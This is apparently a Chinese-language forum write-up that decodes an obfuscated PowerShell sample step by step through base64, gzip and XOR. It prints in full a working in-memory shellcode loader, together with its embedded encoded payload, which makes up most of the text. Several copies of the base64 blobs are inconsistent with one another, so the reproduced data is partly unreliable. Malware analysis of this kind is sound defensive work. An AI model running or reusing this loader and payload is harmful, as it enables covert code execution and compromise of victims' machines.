5tgadGOwr4zF/UFQPDGwwEfpCqj5YtpPLBoAkdhCenoaxPafAM/HITMDmqqTRptsyjseQOxlIWU34l90FHEC+sJi+L+NjZCa2QUVXzpE6PNbW2dhJtabS9Q65fNY8HcxaNBlOyaiia20xTr6UKO+EoGj6ZLwetUEt7vmgjvbshmdyBuLYGbRbWLDnSqjpJTdDr8FNmCHq9niSBD9ojt9qjhjJcyCej0RWNNBTAD2XYskH2M5EacM70148mO9up7AGbgsXiwXBptZaPwUnhnZo9qulxvzKPe62Q+B7mm7XAqlfAOdPv1KfmbIkdvkIGD+5s1HrU0/jBPD7IwB0R1nmoKa6/QL4zojdsqMr1GbueMO6Anexry/5YjqecM5zS7R7TXcnsQRLH7HE0owdLdc8pk63F6F43WFuSxkykVacxGU5npjTnOoy+NBhuTKv9jtyYzXw+k5fLOFrManEM1lu8Mhrm1hjjeKgqzbkfc+rwaSK1VivMLqxHWWmp7T0zSZ+SWqXttJaJtlnv+89NLnAnsTmWJV6eI1ZqLxRmFir9U5evk/Xal/Za5LWSPhv4sj+b7eytPfb2kHg4GTzODrK86JKluehuB0+CKg7XQatzWMm4V2Horb7rHp/d9IjGzlO0a2+RIdaG+0E8q7t6xWG2ytKaV8YKr6dyerQWdbFj9pdDqb/rHCbMYMNH/nTjuyd9utn5fW0dIo5OPG/kKrOwVxnjVSBLczJz9nhyelDWjjJdrCu1jai2RiGyVlOzfwpYLnENlrD15IiMp2BLFsJObY8W1hJyce/sII9PkNMiPDuhMRFR0zwcIceiAc5qZSckfmoMQ9Zko10H9gY/FyV9ERzMU92PIeyatRfiHtS43kcVRgzIE+SdsOxb9KR/oHXWgpjZed1ZWffa4BDmkWN2x/+Lgv87h1Dv/Qm6EjS87LxSKWdzwvubl9vj63Wue9/f6UeQ1njMel3+JtE+dLhfDUuSFkZbzYHOBwPP9bricMhdxhYF2xlHqfT5pL1HoYccmEJhTr02+Y7jYCMbtH4x8cDYdx7GXuEym8GyUf90VabeCWG6Ovukx5tNPoxcPLzOZFfCL1/W4F71A4gi8iyyrVL0sUHTdPbfpMuF34elh/209C6umg1jHyz5qMnJNZUv6Iex56L/YwB+UPrfoc3Ay+e5d+hygz7Hq1wo/lEoCBvqw3lkn+BrBQXUc557EdFCcrfDOnza5Hd16VYrUwK7pG416jt1B+51okYdvm9CK84ubur8ufaNOmj2mfEbNUEGgnH7boB1yFIE81cmOheSEc/DQAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

base64解密（二）

• bash64 第二次解密：

echo -n "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" | base64 -D

• 我们可以初步判断，可能是二进制 、加密之后的、压缩之后的数据
• 我们通过第一次base64解码，发现使用GZIP压缩并Base64编码
  • ;IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
• 其实可以通过H4sIAAAAAAAAA开头也是可以判断的，一般是bash+gzip

gzip压缩解密

• 那我们将压缩处理后的数据通过gzip还原为明文 ：

~ » echo -n "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" | base64 -D | gunzip

• powershell 加载器明文代码如下：

Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
If ([IntPtr]::size -eq 8) {
    start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
    IEX $DoIt
}

base64解密（三）

• 继续解密如下代码

38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg

• 解密后的内容发现再次乱码，我们分析上一步的解密的内容，发现使用异或计算进行加密的

• 将PowerShell ISE执行脚本，进行解密的结果

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

• 上述的代码因为涉及到异或解码过程，所以需要调试PowerShell，可通过微软自带的ISE进行调试， 然后将解密后的变量值通过管道输出至文本文件中，然后后续进行处理。步骤简要记录如下，从base64编码过的数据进行解码然后分配内存执行（属于无文件攻击活动）。

XOR密钥解密

• 将这段数据操作取出，使用WriteAllBytes函数进行输出

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDGZ5dEUjSIgEoJKXg6X5qzPHl1iO1buG+VuC6rtpnoH41qg2+GNzdpA2TdUXolH+tJ/mUO65byu/dx/NX5qstEl/1PmpWeplO0fErSN2UEZRDmJERk1XGQNuTFlKT09CDBYNEwMLQExOU0JXSkFPRhgDbnBqZgMaDRMYA3RKTUdMVFADbXcDFQ0SGAN3UUpHRk1XDBYNExgDYWxqZhoYc3dhcQouKSP4VpuFSK7RM6YYoEWg5NP6S9kDRy7v1+9l6XvafZkG84FqmRudQNMHNVeEM9WPDUrPGzBH2tZZpMkasn6vGEqpNpUUjihiQnkd4eovJ5UwNNWBtXdWBhJ7ISLKZq6AwYNoC+D0hbjBx8myxeQl7sj9hecL1KkJuU2mb+lDhPXgV+QPHbyNyxgW2LAdGXKMGjAwRDJfHspTfpmzbTfjpGaZreF0vnnOmPUrC+QoYqNMVtUlkoRz/PZlPTWZ+1fLS6OregYTdGzqEFvmcEtE2vxec7qhtWIjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3BIXGg0RGw0bEg0SGiMjIyMg')

for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}

[System.IO.File]::WriteAllBytes("C:\test\old.txt", $var_code)

• 执行该ps1 ,查看old.txt 文件

参考链接：

http://t.zoukankan.com/Excellent-person-p-14188692.html
https://www.codenong.com/cs109633482/
http://www.hackdig.com/03/hack-66573.htm

BY:先知论坛